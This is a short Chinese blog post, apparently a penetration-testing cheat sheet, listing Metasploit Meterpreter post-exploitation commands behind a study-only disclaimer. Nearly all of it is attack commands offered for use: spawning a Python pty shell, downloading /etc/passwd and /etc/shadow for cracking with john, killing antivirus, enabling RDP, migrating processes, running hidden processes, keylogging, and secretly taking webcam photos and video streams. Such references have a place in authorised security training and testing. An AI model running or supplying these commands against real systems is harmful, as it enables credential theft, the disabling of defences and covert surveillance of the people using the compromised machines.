浅谈Metasploit(msf)后渗透的常用命令

/ 实用技巧 / 0 条评论 / 3782 浏览

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!!

说明

Meterpreter是一种后渗透工具,它强大的安全界无人不知,简直就是必备必学必用黑客工具。本文主要来说一下msf在后渗透中的常用命令(方便查询,故此记录)

msf

常用命令

通过python获取可交互的shell

shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

下载目标密码(用 unshaow 混合 passwd和shadow 文件,再用john命令获得用户名密码)

download /etc/passwd 下载密码文件到home目录

download /etc/shadow

查看目标机的系统信息

sysinfo

查看目标鸡是否允许在虚拟机上

run post/windows/gather/checkvm

查看完整的网络连接

route

关闭杀毒软件

run post/windows/manage/killav

启动目标机的远程桌面协议,开启3389端口:

run post/windows/manage/enable_rdp

列举当前登陆过的用户

run post/windows/gather/enum_logged_on_users

进程迁移 先执行ps -ef查看进程

migrate 4686

列举安装的程序

run post/windows/gather/enum_applications 

截屏

screenshot

键盘记录

keyscan_start:开启键盘记录功能

keyscan_dump:显示捕捉到的键盘记录信息

keyscan_stop:停止键盘记录功能

执行程序

execute -h 查看使用方法

-H:创建一个隐藏进程

-a:传递给命令的参数

-i:跟进程进行交互

-m:从内存中执行

-t:使用当前伪造的线程令牌运行进程

-s:在给定会话中执行进程

例:execute -f c:/temp/hello.exe

查看靶机是否有摄像头

webcam_list

打开靶机摄像头拍一张照片

webcam_snap

开启直播模式,抓取视频

webcam_stream

暂时就这些

更多请参考

萌新科普 手把手教你如何用MSF进行后渗透测试
后渗透之meterpreter使用攻略

本文最后编辑时间为: 2019-08-23

如本文对你有帮助,点击下面广告支持一下吧,创作不易,感谢大佬。

safe6